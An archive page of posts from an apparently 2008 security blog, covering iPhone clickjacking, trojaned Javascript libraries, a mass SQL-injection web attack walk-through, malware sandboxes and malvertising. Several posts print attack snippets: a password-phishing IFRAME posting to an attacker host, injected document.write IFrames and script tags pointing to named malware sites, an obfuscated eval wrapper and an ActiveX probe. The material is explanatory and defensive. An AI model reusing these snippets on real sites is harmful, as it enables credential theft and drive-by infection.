Wednesday, November 26, 2008

Clickjacking - iPhone Style

In the past, I've blogged about clickjacking and how to defend against it. While Adobe has patched Flash Player to protect against one of the more frightening attacks, which could lead to hijacking of a victim's webcam and microphone, many browsers and applications remain vulnerable. In fact, when Apple released the latest firmware for the iPhone (v2.2) a few days ago, it quietly addressed what some consider to be a clickjacking vulnerability in Mobile Safari, the iPhone's web browser. It's definitely a different take on clickjacking, and it would be fair to argue that it's a different vulnerability altogether, but it is interesting nonetheless, so for the sake of argument (and blog hits) I'll stick with the clickjacking title and describe the unique aspects of this vulnerability in greater detail.

Mobile Safari was not actually vulnerable to the 'traditional' version of clickjacking, but it is susceptible to this new variant, which was discovered by John Resig and reported to Apple (CVE-2008-4232). There is no formal definition of clickjacking, but I'll define it as "obfuscating web page content in order to social engineer a victim into performing an action other than the one intended". Now I'll split clickjacking into the following categories:
  1. Layered Clickjacking - When Jeremiah Grossman and Robert Hansen first discussed clickjacking, they detailed how z-index values in Cascading Style Sheets (CSS) could be used to layer content on top of other content. Then, leveraging CSS opacity values, the transparency of the layered content could be adjusted to show the content on the bottom while hiding the content on top, which is what the victim actually interacts with. A demonstration of this technique is available here.
  2. Overflow Clickjacking - The iPhone vulnerability does not require z-index or opacity values. Instead, the problem stems from the fact that the content of an embedded IFRAME can be forced to overflow its bounds and spill onto the parent page. This is accomplished by resizing the IFRAME's content with CSS transforms, which are supported by the WebKit engine.
Rather than talking about it, let's see overflow clickjacking in action.

[Fig 1 - Not Vulnerable / Fig 2 - Vulnerable: screenshots from the iPhone Clickjacking Demo video]

In Fig 1 (not vulnerable), you can see both the IFRAME content and the page content. Both have identical forms for password submission, but the IFRAME form is submitted to an attacker-controlled page. In Fig 2 (vulnerable), you can see that the evil IFRAME has overwritten the page contents and we see only one (evil) password submission form.
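
To make the technique concrete, here is a minimal sketch of what the attacker-controlled content loaded inside such an IFRAME could look like. The URL and scale factor are made up, and this is not the exact markup used in the demo: the idea is simply that the embedded page scales itself with a WebKit CSS transform, and on unpatched Mobile Safari the enlarged content escapes the IFRAME's bounds and covers the parent page.

<!-- evil-frame.html: hypothetical content served inside the attacker-controlled IFRAME -->
<html>
  <body style="-webkit-transform: scale(4); -webkit-transform-origin: 0 0;">
    <!-- mimics the parent page's login form, but posts the password to the attacker's server -->
    <form action="http://attacker.example.com/collect" method="post">
      Password: <input type="password" name="password">
      <input type="submit" value="Submit">
    </form>
  </body>
</html>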

While this is interesting, in reality it comes with some very real limitations that restrict the usefulness of the attack. To be valuable, we need a situation where an attacker controls the content of an IFRAME on a targeted page. This could occur with mashups or banner ads. An attacker could deliver IFRAME content to a subscribing web page and overwrite a portion of the parent page. They would, however, need to know which page was pulling the content so they could properly align the new content and make for a convincing attack.

I expect that we'll see a whole host of clickjacking-esque attacks in the coming months, affecting various browsers/applications. The ability to format page content via CSS, DHTML, etc., combined with improper implementations of these standards, leaves plenty of room for error.

Happy Thanksgiving!

- michael

Technical Quickie: building SpiderMonkey on FreeBSD 6.2 AMD64

I wanted to get Didier Stevens' modified SpiderMonkey Javascript engine compiled and running on a FreeBSD 6.2 AMD64 box. It turns out the config files shipped with his 1.7.0 version do not include FreeBSD support, so I wound up having to hack something together...and I thought I would share what I did in case others are interested. I assume these instructions would be relatively applicable to later FreeBSD versions as well.

When you go to build the source, config.mk pulls in an appropriate file from config/ to use for your system. On FreeBSD 6.2 AMD64, the output of 'uname -s' and 'uname -r' essentially leads to the config file named 'config/FreeBSD6.2-RELEASE.mk'. So what I wound up doing was going into the config/ directory and copying the 'Linux-All.mk' file to 'FreeBSD6.2-RELEASE.mk'.

If we were building on an x86 (32-bit) FreeBSD platform, that might be all we need to do. However, since we're building on AMD64 (64-bit), this configuration file needs to be modified, because the default Linux configuration file refers to the 64-bit CPU architecture as 'x86_64', while on FreeBSD AMD64 the CPU architecture is reported as 'amd64'. Fortunately the fix is simple: just do a find/replace on all occurrences of 'x86_64' and change them to 'amd64'. There are three changes in total.

Now that you've made those changes, you should be all set. Just build the application ("gmake -f Makefile.ref") and then grab the 'js' binary out of the 'FreeBSD6.2-RELEASE_DBG.OBJ/' directory.
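
For reference, the whole process boils down to something like this. It's only a sketch: run it from the SpiderMonkey source directory, and adjust the file names if your release string differs from mine.

cd config
# build the FreeBSD config from the Linux one, swapping the CPU architecture name
sed 's/x86_64/amd64/g' Linux-All.mk > FreeBSD6.2-RELEASE.mk
cd ..
gmake -f Makefile.ref
# the resulting interpreter binary
ls FreeBSD6.2-RELEASE_DBG.OBJ/js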

Enjoy.

- Jeff

Not all P2P is evil

Allow me to step up on this conveniently available box of soap for a minute. I can't tell you the number of discussions I've been in where my conversation partner erroneously assumed that "P2P" was strictly synonymous with file sharing, copyright infringement, bandwidth hogging, and corporate time wasting. My viewpoint is that the term "P2P" references a specific network/communication design (i.e. arbitrary peers talking to other peers, rather than clients talking to dedicated servers), not a particular usage. In other words, P2P is a communication technology platform that is agnostic to the application built on top of it. There are video delivery applications, file sharing applications, VoIP applications, IM applications, and privacy shielding applications that are built using P2P as their communication framework. You cannot define P2P as being any single one of those (particularly file sharing), and there are many legitimate uses for many of those listed applications. In fact, many businesses use functional non-P2P alternatives of those same types of applications on a daily basis.

Now, I completely understand and agree that P2P has received this bad reputation because the earliest adopters of the P2P communication model were applications that many organizations consider questionable. That's why I'm always happy to find uses of P2P that provide a positive benefit. A recent example I ran across was the Network Early Warning System (NEWS), which uses P2P communication to cross-talk and alert about network connectivity and traffic issues. The Northwestern University Aqualab (creators of NEWS) liken NEWS to a "neighborhood watch for the Internet," with particular benefits to ISPs. Aqualab also has many other ongoing projects that relate to improving the performance and scalability of P2P communication models.

There is also Pando, a company that offers what they call a "peer assisted" content delivery service targeted at businesses that need to deliver large amounts of media to their users. Basically they have married the traditional CDN concept with a P2P communication and distribution model, resulting in something they say scales significantly better (and thus costs less) than the traditional CDN approach. As an aside, our research shows that Pando is actually a tweaked version of BitTorrent that runs over standard SSL, which allows it to be served over port 443 with ease.

So the next time someone says "P2P is evil," remind them that P2P is just a platform utilized by many different applications, and they should clarify which P2P application(s) they have in mind.

- Jeff

Thursday, November 20, 2008

Trusted Computing is Chasing Yesterday's Problems

Earlier this week I was able to stop by the CSI 2008 conference. I only caught a couple of the presentations, including a keynote by Steve Hanna, a Distinguished Engineer at Juniper Networks. Steve was speaking about trusted computing, explaining what it is and how it will tackle some of the security problems that we face. Now I'll confess that I've never been completely sold on the concept of trusted computing. I've tended to view it as somewhat of an ivory tower initiative that might work fine in a structured, high-security environment such as a DoD network, but is not overly practical for the 'real world'. That said, Steve made some strong points about the value of trusted computing and argued that it's closer to becoming a mainstream reality than I'd realized.

Steve detailed three primary layers in his vision of trusted computing:
  1. Trusted hardware - The Trusted Platform Module (TPM) has a unique, secret RSA key burned into it at the time of manufacture and can be used for hardware identification. The TPM specification was developed by the Trusted Computing Group and many chip manufacturers have included a TPM in laptop chip sets since 2006.
  2. Trusted Operating System - Projects such as the NSA High Assurance Platform Program seek to leverage the TPM to create the foundation of a secure operating system.
  3. Network Access Control - Protecting access to resources or the network.
Now I can envision how such a system, if implemented, could go a long way towards limiting the spread of malicious code by ensuring that untrusted binaries are simply not permitted to execute on a given system. The problem with such an approach is that it works in opposition to the open nature of the Internet, a principle that we've come to know and love. Would users be willing to be restricted in the applications that can be run on their machines? I don't think so. In general we're willing to accept security risks in favor of an open architecture that allows flexibility. For proof, look no further than the cell phone industry. Cell phones were once inflexible boxes that ran specific applications, and if you didn't like it, you could buy another phone. Today, however, telecoms are tripping over one another to show just how open they are and how they welcome third-party applications. Will this break down barriers for mobile malicious code? Sure, but consumers don't care. They want flexibility.

My second concern with the vision for trusted computing is that it will do little to prevent web-based attacks, which don't require binary code execution, and threats of this nature will only continue to grow. Take clickjacking, for example. This is really a social engineering attack. You are convincing someone to perform an action which they did not intend to perform, because you are able to manipulate the look and feel of the page that they're viewing. Cross-Site Request Forgery is another great example. Once again, the attack leverages web functionality as it was designed. No binary execution is required.

After listening to Steve's keynote, I have a better understanding and appreciation for trusted computing. However, I'm more convinced than ever that it's focused on yesterday's attacks, while we as an industry need to be looking to tomorrow.

- michael

Monday, November 17, 2008

Hiding web 2.0 malware in plain sight

Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a trend we're seeing in attacker tactics, and predict how it may evolve into what will become commonplace tomorrow.

Recently we ran across a modified version of Adobe's Javascript-based Flash detection script used as part of a drive-by attack on web browsers. Basically the malware writers took the Flash Player Version Detection v1.7 script (AC_RunActiveContent.js) and tweaked it with a malicious payload. The heart of the evilness was caused by simply adding one line towards the end of the script:

document.write("<i"+"fr"+"ame src='http://__someplace__.com/" +
    "pdfdoc/index.php?id=com2' width=1 height=1></ifr"+"am"+"e>");

This causes the script to write out an IFrame tag pointing to a malware site, which then tries to deliver exploits to the browser in an attempt to cause arbitrary code execution.

I'm willing to speculate that anyone doing a shallow/naive review of the script could prematurely conclude that it is the proper Adobe Flash detection script and thus dismiss it as non-evil. Hopefully, though, many investigators would plow through the entire file, eventually see the plain-as-day extra IFrame code that was added, and thus see through the facade.

However, what if the IFrame code wasn’t easily visible? Javascript 'packers' (programs that transform the Javascript code into smaller, more concise code) are becoming the norm on the web for slimming down Javascript code and saving some transfer bandwidth. They work by rewriting the code and essentially obfuscate what is going on as a byproduct. This can make it much more difficult to understand what the Javascript code is doing simply by casually perusing it; a simple Javascript 'document.write' of a malicious IFrame tag may not be so glaringly obvious anymore. And unfortunately, unlike executable (.EXE) packers such as UPX, the Javascript packers are used by many web sites and projects for legitimate reasons...so the mere presence of a packed Javascript file isn't an immediate red flag of its malicious intent (i.e. alerting on packed Javascript files is going to result in a lot of false positives).
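
As a contrived illustration (this is a toy wrapper I made up, not the output of any real packer, which would be far denser), even a trivial rewriting layer keeps a malicious document.write from jumping off the page at a casual reader:

// illustrative only: a toy obfuscation layer hiding a document.write of an IFrame tag
// (the URL is a placeholder; real packed code is machine-generated and much harder to read)
eval(function(s){ return s.replace(/\$W/g, "document.write"); }(
  "$W('<ifr'+'ame src=\"http://__someplace__.com/x\" width=1 height=1></ifr'+'ame>')"
));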

How does this help attackers? Well, even though alerting on every packed Javascript file is not recommended, packing should still at least raise the suspicion level. An attacker taking their 'evil.js' file and packing it might obfuscate what evil.js is doing, but the fact that it's a packed file of unknown function may still cause people to investigate. Instead, an attacker can extend the previously mentioned tactic of hiding a malicious payload inside a legitimate Javascript library...but this time, pick a library that is commonly distributed in packed form and widely used. For example, we see packed versions of the JQuery Javascript library quite often on many different sites. A clever attacker could take the (unpacked) jquery.js file, insert their malicious code, pack it using the same packer normally seen used with jquery.js, and then deploy it. Anyone encountering this malicious file may, at first glance, consider it to be just the usual packed jquery.js file and ignore it; any automated signatures meant to flag packed Javascript files would, on the surface, not really differentiate between the packed original version and the packed modified version. And any deeper investigation into the file by looking at the code's behavior (or 'unpacking' it via various means) will, at first, just reveal what appears to be the standard set of JQuery functionality. Only those who persist past all the obvious signs that the file is a legitimate jquery.js Javascript file would perhaps encounter the maliciousness of this web 2.0 Trojan horse.

Fortunately there is a workable solution to this problem: whitelists of known-good Javascript file hashes. Since the obvious targets are widely-deployed Web 2.0 Javascript libraries (JQuery, Dojo, SWFObject, Prototype, etc.) it would be feasible to construct a whitelist of the true/safe versions of these popular library files. Of course, maintaining a whitelist is a time-consuming effort, especially with new versions of each library coming out so often. And site designers would need to be encouraged to not make any personalizations/modifications directly to these standard library files, lest they trigger the alarms. It would be interesting if such a whitelist was then utilized by browser extensions such as NoScript to know automatically which Javascript files are safe to execute...but vetting the function library is a minor part of the problem since the site still needs to use custom Javascript to access/utilize the library in the first place.
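
To make the whitelist idea concrete, a checker could be as simple as the following sketch (written for Node.js or any environment with a hashing routine; the file name and digest are placeholders, not the real hash of any library release):

// sketch: flag a served Javascript library that doesn't match a known-good hash
var crypto = require('crypto');
var fs = require('fs');

// placeholder digests -- a real whitelist would hold the published hashes of each library version
var KNOWN_GOOD = {
  'jquery-1.2.6.pack.js': 'PLACEHOLDER_SHA256_DIGEST'
};

function isWhitelisted(name, path) {
  var digest = crypto.createHash('sha256').update(fs.readFileSync(path)).digest('hex');
  return KNOWN_GOOD[name] === digest;
}

if (!isWhitelisted('jquery-1.2.6.pack.js', './jquery-1.2.6.pack.js')) {
  console.log('library does not match the whitelist - inspect it before trusting it');
}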

It’s a hard problem still looking for a perfect solution (like many other security problems). Until next time,

- Jeff

Thursday, November 13, 2008

Stepping Through a Mass Web Attack

A few days ago, Kaspersky reported on yet another mass web attack. Such attacks are quickly becoming a preferred attack vector, as they permit mass infection with minimal effort. We've seen this before, and not just once. In fact, it seems to be popular among Chinese hackers and is often used to gather authentication credentials for online games. While it hasn't yet been verified, it appears that SQL injection vulnerabilities led to the initial server infections. All infected servers seem to be running Microsoft ASP pages, a common target for those seeking sites vulnerable to SQL injection.

I'm fascinated by such attacks as they illustrate the interconnected nature of the web and shatter the myth that you are safe if you stick to browsing reputable sites. Sadly, reputable sites struggle with vulnerabilities on a regular basis. The unfortunate reality is that any site, no matter how big or small, could be infected. In this latest attack, Travelocity was compromised. While vulnerable servers were infected, the true targets of these attacks are the end users who visit the sites. I've been preaching for some time now that we need to shift our focus from servers to browsers. We spend the majority of our security resources locking down servers and put minimal effort into protecting users browsing the web. Attackers have shifted their focus and we must do the same.

Attack Walk-Through

According to Kaspersky, the attack leverages multiple browser vulnerabilities and a variety of sites to host the attack scripts and malicious code. In order to better understand how these attacks succeed, let's walk through one such attack scenario, which was live at the time this post was written:

Step 1 - Server Infection

The attack begins by injecting code onto as many vulnerable web servers as possible. This is commonly accomplished via SQL injection. In this specific example, the following code was injected:

<script src="http://dbios.org/h.js"></script>

This code won't change the appearance of the page, so a victim has no way of knowing that the so-called reputable page is actually launching an attack on their browser. A quick Google search illustrates the mass nature of the attack and reveals that many sites are still infected.
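
If you administer a site and want a quick way to check your own pages, a minimal script along these lines would do. It is only a sketch (written for Node.js; the host and path are placeholders), and the pattern matches the specific tag shown above, so other campaigns would need different patterns:

// sketch: fetch one of your own pages and look for the injected script reference
var http = require('http');

function checkPage(host, path) {
  http.get({ host: host, path: path }, function (res) {
    var body = '';
    res.on('data', function (chunk) { body += chunk; });
    res.on('end', function () {
      if (/<script[^>]+src=["']?http:\/\/dbios\.org\/h\.js/i.test(body)) {
        console.log('INFECTED: ' + host + path);
      } else {
        console.log('no injected tag found: ' + host + path);
      }
    });
  });
}

checkPage('www.example.com', '/');   // substitute your own host and page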

Step 2 - Redirects

The initial JavaScript file typically doesn't contain the ultimate attack, but rather calls a variety of other scripts from different locations. This may be done in part to obfuscate the attack but is more likely done simply to accommodate multiple vulnerabilities and download sites in order to make the attack more robust and reach as many potential victims as possible. In our case, the following two IFRAMEs are added to the page:

document.write("<iframe width='20' height='0' src='http://vvexe.com/haha/index.html'></iframe>");
document.write("<iframe width='0' height='0' src='http://www.kenya.com/faq.htm'></iframe>");


Step 3 - Exploitation

Kaspersky notes that this latest round targets a variety of vulnerabilities in web browsers and Macromedia Flash Player. In our example, the exploitation goes after a vulnerability in the Snapshot Viewer for Microsoft Access ActiveX control, published on August 12, 2008 and detailed in MS08-041. One of the IFRAMEs contains code which attempts to instantiate the Snapshot Viewer ActiveX control, as shown below:

try{var n;
var ll=new ActiveXObject("snpvw.Snapshot Viewer Control.1");}
catch(n){}
// if the control instantiated without error, pull in the page hosting the actual exploit
finally{if(n!="[object Error]"){document.write("<iframe width=50 height=0 src=ff.htm></iframe>");}}

As can be seen, if the ActiveX control is indeed accessible, the browser then opens yet another IFRAME from http://vvexe.com/haha/ff.htm, and this is where the attack actually lies. The writers of this exploit are either not particularly skilled or just lazy, as they've leveraged an already public exploit line for line and simply changed the target download to http://ip.kanlang.com/haha/down.exe.

Step 4 - Client Infection

The down.exe executable is a Trojan, which goes by various aliases, including Infostealer.Wowcraft. The Trojan serves as a keylogger and is designed to harvest and transmit authentication credentials for World of Warcraft.

Lessons Learned
  1. Surfing 'reputable sites' is not guaranteed to prevent infection.
  2. A server side compromise is often the first step in a client side attack.
  3. Defense in depth is critical. In this situation, the threat can be mitigated by patch management, network- and host-based AV, and blocking of malicious URLs.
Happy surfing!

- michael

Friday, November 7, 2008

Cloud Services for Analyzing Malware

Despite continuing promises from software vendors, malware isn't going anywhere. Analyzing malware to protect against it and repair the damage that it may have done is a significant part of the job description for many security professionals. The sheer volume of malware can make dealing with it an overwhelming task. Fortunately, a number of free cloud-based services have emerged to aid in the task of analyzing malware.

I'll divide the analysis tools into two categories - Anti-Virus Multi-Scanners and Sandboxes. The former is nothing more than a collection of AV scanners designed to run together, analyzing the same file and returning the results from each AV vendor. This can be a very valuable starting point. It is frustrating to spend hours or days conducting deep analysis on a new binary, only to find out that AV vendors have already analyzed the same file. A quick run through a multi-scanner can help let you know if you're dealing with 0day or yesterday's news. Sandboxes, on the other hand, are emulation environments which perform automated behavioral analysis on a binary file. They allow the binary to execute and emulate the services that it attempts to interact with, while recording the activity which occurs, such as file reads/writes, registry access and network traffic.

AV Multi-Scanners

Building your own multi-scanner isn't a terribly difficult or expensive challenge. You need to obtain AV SDKs or command line tools from various vendors, develop a wrapper/front-end to submit the same malicious code samples to all of them at the same time, and parse/combine the results into a meaningful report. While it may be worth the effort if you expect to feed a heavy and regular volume of binaries into the multi-scanner, say from a honeypot network, there are free online alternatives if you're looking for only occasional analysis. A rough sketch of such a do-it-yourself wrapper is shown below, followed by a chart comparing the functionality of a couple of popular (and free) online multi-scanners.
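
Something along these lines is all the wrapper really takes. This is only a sketch (written for Node.js): the engine names and command-line flags are placeholders for whatever scanners you actually have licensed, and each vendor's output would need its own parsing to produce a combined report.

// sketch: run the same sample through several command-line AV engines and dump each verdict
var execFile = require('child_process').execFile;

var SCANNERS = [
  { name: 'vendor-a', cmd: 'vendora-cli',  args: ['--scan'] },   // placeholder command
  { name: 'vendor-b', cmd: 'vendorb-scan', args: ['-f'] }        // placeholder command
];

function scanSample(sample) {
  SCANNERS.forEach(function (s) {
    execFile(s.cmd, s.args.concat([sample]), function (err, stdout, stderr) {
      console.log('=== ' + s.name + ' ===');
      console.log(err ? 'error: ' + err.message : stdout.trim());
    });
  });
}

scanSample('./suspicious-sample.bin');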

                      VirusTotal    VirScan.org
No. of Engines        34            39
Zip support           No            Yes
Web Submissions       Yes           Yes
Email Submissions     Yes           No
SSL Support           Yes           No


Sandboxes

Sandboxes automate the process of behavioral analysis. They permit a binary to execute in a controlled environment and monitor the activity which occurs. Given that we're dealing with malicious code, the binaries will generally attempt to spread, often by scanning for vulnerable hosts. Rather than actually permit malware to spread externally, sandboxes can simulate network responses to allow the binary to continue executing without actually permitting third-party infection. If a steady volume of analysis is required, you'll want to consider commercial products such as those offered by Norman and Sunbelt Software; however, such solutions can be expensive. If you only require periodic analysis, both vendors offer free web-based access to their platforms. Anubis, by contrast, is purely a free web-based service and does not have a commercial product offering. The chart below compares the functionality of these three cloud-based sandboxes:

                      Anubis    Norman Sandbox    CWSandbox
URL Analysis          Yes       No                No
Zip Support           Yes       No                No
SSL Support           Yes       No                No
Email Results         Yes       Yes               Yes
Dependent Binaries    Yes       No                No


As can be seen, for an entirely free service, Anubis has an impressive feature set. They even encourage the automated submission of binaries for analysis, so the platform can be integrated into a honeypot network.

It's great to see free resources emerging for malware analysis. As mentioned, these free services won't meet everyone's needs, but if you're tasked with securing a network and only occasionally need analysis capabilities, these sites can significantly streamline your efforts.

- michael

Trust two times removed

Hello everyone, Jeff Forristal here. I thought I'd take a moment to discuss a real-life security incident that I recently reviewed in post-mortem fashion. The plot is simple: while the person was surfing the web, their browser was exploited by a piece of malware targeting a popular browser plugin. However, it's the details that make this story a bit intriguing...and scary.

The person's surfing session was quite normal and not particularly careless. During the moments just before the incident, the person was using Google to find an answer to a technical question. One of the top search results was for a smaller site that hosted technical tidbits of information collected and donated from various information sources. The person clicked through to that site. Now, this site is not a site that would be considered to have a 'risky' reputation, nor does it harbor any direct malware. It's just a normal, basic site that looks to be someone's personal project (site was designed in FrontPage 6.0!) to better the world by collecting and publishing useful information. In fact, the only thing questionable about it is the number of syndicated ads on the page: 7, by our count, from multiple vendors (BidVertiser, Google, Clicksor, and FastClick). Of course, it makes sense that they would (over-)populate their page(s) with ads in an attempt to generate revenue from their content publishing efforts. But this turned out to be the problem.

See, once the person's browser landed on this ad-infested page, the browser started running around like mad to fetch all the syndicated ad content. Each ad syndication attempt usually results in multiple browser requests, because the main request to the ad syndicator often results in a chain of redirects eventually landing at the specific content of the "advertisee" utilizing the syndication service. As the term 'syndication' implies, the ad services are just the middle-man between the web site and the advertisee. And the website is just the middle-man between the ad service and the web surfer.

Anyways, what eventually happened is that one of the ad syndicators served up an advertisee's ad...and it just so happened that the ad was actually a piece of malware that could immediately compromise the vulnerable browser plugin. This is not necessarily new news; attackers have been known for quite a while to leverage advertising syndication as a way to spread their malware. But it's a bit scary to witness in action, and the growing amount of advertising syndication utilized by web sites is going to make it a more predominant malware delivery vector. The problem is exacerbated by the fact that the ads are no longer simple graphics; advertising syndicators usually allow their clients (the advertisees) to specify arbitrary HTML. This gives the advertisee carte blanche to use rich media ads that rely on multiple technologies such as DHTML, Javascript, Flash, etc. But this also gives an attacker full access to syndicate any arbitrary piece of malware that could be hosted/served via a normal web page. (Side note: maybe Google is onto something by only using pure text-based ads; the text is very easy to validate and stands practically no chance of harboring a piece of malware...)

What does this all mean? Well, there are a few things. First, all of those vendors who suggest an exploit is partially mitigated by the requirement that a "user must visit a malicious web page in order to be attacked" need to change their tune, because advertising syndication is essentially bringing the malicious web pages (via rich media ad capabilities) to the user. Second, the onus is on the advertising syndication services to ensure their clients aren't trying to deliver malware ads through the service. That's a tall order, and the ad vendors have not exactly been batting 1000. Third, in the age of mashups and syndication, we no longer have a situation where a user only has to decide whether they trust the destination web site; they must now trust all the components that are mashed and syndicated into that site, and in turn trust all the components those components use, etc. In the incident I just talked about, we have the person trusting the web site, the web site trusting the advertising services, and the advertising services trusting their clients. Thus we come to having trust two times removed. Worse, web browsers do not equip people with the necessary tools to really help them manage this trust chain effectively; it's pretty much an all-or-nothing shot based upon the user's trust of the immediate target web site. In the meantime, maybe browser plugins like Adblock Plus and NoScript could help, although that essentially robs legitimate sites of advertising revenue. However, if enough users start to use ad blocking software as a matter of security, perhaps the advertising services will become pickier about their clientele and better scrutinize what they are actually syndicating.

Only time will tell, I suppose.
- Jeff

ps. if you are interested in which advertising vendor was the 'enabler' for the mentioned incident, well, we cannot say with 100% certainty. But there does seem to be a popular opinion against one of the vendors.